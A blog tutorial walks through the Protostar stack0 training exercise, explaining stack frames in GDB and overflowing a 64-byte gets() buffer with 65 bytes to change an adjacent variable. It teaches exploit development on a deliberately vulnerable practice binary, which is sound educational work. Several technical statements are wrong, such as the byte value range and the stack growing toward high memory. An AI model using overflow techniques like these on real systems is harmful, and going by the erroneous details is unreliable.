Protostar Stack0 walkthrough

HacksLand | The computer science playground

Posted by Thilan Dissanayaka on Aug 12, 2019

Hello there, In this tutorial we are going to learn Linux exploit development. We use protostar Linux mashing for this purpose. Protostar was developed by .Unfortunately The host site is now down. Anyway you can download the iso file from internet. Just google it. So first Download it and use virtual box or Vmware as the virtualization software.

Introducing to Protostar

As the first step boot protostar and log in as root. Default username/password s are "root:godmode". After log in as root use ifconfig to get the IP of the mashing.

Now you can use SSH in Linux or putty to access our victim mashing. This time you have to log in as normal user. Default credentials are "user:user".

There is one more thing to do before you actually start learning process. Just change your shell to bash by entering bash.Because with bash shell you have more power than the sh shell.

Now the interesting part is beginning. All of challenges are located inside "/opt/protostar/bin".

So use cd && ls

cd /opt/protostar/bin && ls
There are 25 levels to play which can be divided into following main categories.
  1. Stack based buffer overflows
  2. Heap based buffer overflows
  3. Format string Exploits

Most easy part to understand is stack based exploits. Even if you are new to exploit development you can understand what's going on. The first level you want to try is stack0. It'll teach you how function calls are happened?. How stack frames are build and how to over flaw data outside of allocated buffer etc.

Take a look at stack0 binary

lets see what we have to do.


just enter a string and see what happens.

It's said to retry. :-(

We have given the source code also. But actually it doesn't help a lot. Just try to get an idea of what happening.

int main(int argc,char **argv){

  volatile int modified;
  char buffer[64];
    printf("you have changed the 'modified' variable\n");
    printf("Try again?\n");

First it declare two variables called 'modified' and 'buffer'. The size of buffer is 64 bytes. After it takes a string as the input from user and copies that to buffer space. This code doesn't any kind of bound checking before copy data into buffer space. It doesn't care if supplied string is lager than buffer space . Buffer overflows are occurred in such a situations.

Did you note something special when declaring 'modified' integer value.? why there is a volatile keyword? First we give value zero to our 'modified' value.But in this code it's never changed and after that there is an if-statement for check if int variable is equal to zero or not. What a joke hear. :-) . When compiler see this , it don't care about if-statement and optimize the code.That's why the 'volatile' keyword is used in above code. It says compiler , 'Hay GCC Don't bother about the integer value . It may change when run time :-)'

Disassembling the binary

Now the time to disassemble the binary and see inner working of it. We use GDB for this. Let me introduce you our awesome tool GDB. It's a acronym for GNU debugger. By using a debugger we can see how things are happening inside the mashing code. In following screenshot you can see I have used Intel syntax for assembly.

set disassembly-flavor intel

The reason to use Intel's Assembly syntax is it's clear , user friendly and easy to understand.

As the next step I disassembled the main function.You can see assembly instructions in the red box.

You can see that i disassembled the main function with

disass main

There are some Hexadecimal values in the left hand side.Those are called memory addresses.Our assembly instructions are stored at these locations. The computer memory is divided into some small parts called bytes.You know that one byte is equal to 8 bits. 1 bit can hold zero or one. So in binary 8 bits can hold 256 values. Their range is 0 to 256 in decimal. Normally we work with 4 byte words.

In CPU there are 5 main components for processes instructions.

  1. Data bus
  2. Instruction Decoder
  3. Program counter
  4. Arithmetic and logic unit (ALU)
  5. Registers

The program counter keeps track of what instruction should be processed this time and what's next to get executed. Actually this is happened with EIP register. EIP register always hold the memory address of the instruction . Now CPU knows the memory address of the instruction . So it takes the instruction and give what ever found on that address to the Instruction Decoder. The instruction those fetched from memory are something called op-codes. The have their own meaning.The Op-Code for pop EDI is 5f while Op-Code for inc ebp is 45 .Duty of Instruction Decoder is find out what to do from these op-codes.If it see op-code 5f it says CPU 'pop off the stack and save value of the ESP in EDI' . As the final step needed data come through the data bus and processed in ALU. After that processed data is saved in memory or registers. OK , I hope you understood what's going on hear.

Actually instructions like push ebp / mov ebp,esp are not coming from main function. They are included by the compiler to make a stack frame for the function. Let me quickly introduce you the term stack.

The stack is a concept that used in Computer science.In programs we have to use functions for make things easy and clear. In languages like C and python you can see that we supply some arguments to function and functions return some data too. So how this is possible? .This is the place Stack comes to play. We use stack for give function arguments.The stack is always begin from high memory and grows to high memory.We can add something to stack by using push command and remove with pop command. The ESP register always points to the top of stack.

In following image I have set a break point inside of main function.For that I used break *0x80483f4. You may ask me 'Why you didn't use break main?' . Well if we use break main the debugger skips function prologue and only care about the main function's code because it know the prologue code is coming from compiler. Since we want to see how is stack build, we set the BP like this.

Next , we use the command i r to see what's inside of registers.Actually this short form of info registers. You can use one of them .(i r or info registers).Note that EIP is pointing to a address 0x80483f4. Do you remember it? It was the address of first instruction of above disassembled code.EIP contains that value because next instruction waiting to execute is there. we have stopped execution at the start of the code. Following is the graphical view of the stack. You can see right now there is something on the top of stack called ret. So what's it. That is return address and after completing our function's process CPU have to go to that address and execute what ever instruction found at there.

We can examine stack also in GDB. Let's see how.Command for examine memory in hexadecimal is below.

x/x [memory address]

If we want to see content in decimal we use d and if we use t we can see in binary.

x/d 0xbffff7bc : examine memory in decimal at 0xbffff7bc x/x 0xbffff7bc : examine memory in hexadecimal at 0xbffff7bc x/t 0xbffff7bc : examine memory in binary at 0xbffff7bc

Get ready to the extraction

What if i want to examine multiple words those begin from a address? We can do it in this way.

x/10wx 0xbffff7bc : Examine 10 words in hex at 0xbffff7bc

Another thing to note. We can examine memory at a register directly by using this method.

x/30wx $esp.

In above image you can see the return address whiting a green box at top of the esp. Remember that top of the stack in low memory addresses.

Next instruction is push ebp . So theoretically the value of EBP register should copied to top of the stack after this instruction. Let's see if this true or not?

You can see that in a blue box there is a value copied to stack and it's 0xbfff838. This is nothing but the value of EBP. :-) . Anther thing is happened . Esp changed from 0xbffff7bc to 0xbffff7bc. Calculate the difference of them using your calculator on mind.It will be 4. Yes the size of a register is 4 bytes.So ESP got reduced by 4 bytes. Wait why ESP reduced while we push data to stack?. This is because stack is growing to low memory. If something is pushed to stack ESP is reduced. If we pop off the stack ESP goes high. Anyway right now stack looks like this.

Next instruction to execute is mov ebp , esp . So the value of ESP should copied to EBP. Now both of ESP and ESP registers point to the top of stack like this.

Let's see this situation in GDB.

I have used another GDB command called ni hear. It is similar to ' next instruction' . The name says all. It simply executes next instruction . Also in above screenshot you can see that ESP has never changed.We have never push or pop things to stack. So ESP stays on it's current location.

Next there is a code as and esp , 0xfffffff0 . This command is used to alignment the stack and we don't want to care much about this . How ever ESP is changed like this. (Goes to a low address)

As the next instruction there is a sub esp , 0x60 So ESP is reduced by 96 bytes. Where is 96 coming from? . 60 in Hex is similar to 96 in decimal. This is how allocate space for local variables in stack.

We can see this on GDB too.

0xbffff7b0 - 0xbffff750 = 0x60 ==> 96 Bytes in decimal .

OK. Let's see what's up to next?.

mov DWRD PTR [esp + 0x5c] , 0x0

This code gets the address pointed by esp + 0x5c and copies a zero value to it. Since 0x5c is equal to 92 in decimal a zero is copied to 4 bytes ahead of saved EBP. Can you imagine what this line of code actually does? In our C source code there was a int value that equal to zero. This is that value. :-)

Next instruction is.

lea eax , [esp + 0x1c]

lea is stand for Load Effective Address .This will load the address pointed by esp + 0x1c = esp + 28

After that, what ever in the EAX is pushed to the stack. What both of above instructions did together? They load a address to stack. But why? .This is the argument for next function. the next thing to do is call to GETS function. The argument to that function was pushed to the stack. After calling to GETS function it writes data in to that memory address.

Let's see what happen when GETS function writes input data to the buffer on stack. Now I enter some A s as the string to function.

You can clearly see that our input is copied on the stack.

What if I enter more large number of As ? It will overflow in to our previous value (modified integer). How much data is needed to overflow into integer value? Since our buffer is 64 bytes If I enter 65 As It will get modified.

Now all clear and OK. It's time to extraction. We can use lovely <3 Python for this.

If I enter python -c "print '\x41' * 65 " in a shell I can get 65 As printed. So I can pipe this command's output as input of stack0 program like this.

Awesome. we did it. We successfully modified the value. It was not just one command. we learned all the theories.

Now there is one more thing. What if I enter a more large input? .

We got a segmentation fault. Real happiness begins hear. We are going to learn more on this topic on future tutorials.

See you again soon. Thank for reading.

Hi, I'm Thilan. An engineering student from SriLanka. I love to code with Python, JavaScript PHP and C.

Also read

Aug 12
CPU Registers

In today tutorial I'll discuss about registers in CPU. It's an important topic in computer....

Aug 12
What is a cookie?

If you are working with web applications you may have heard about cookies. Also when we browsing....

Sep 05
PHP MySQL tutorial | create delete and modify tables

This is the second tutorial of our PHP+MySQL tutorial serious.In last tutorial we saw that how we....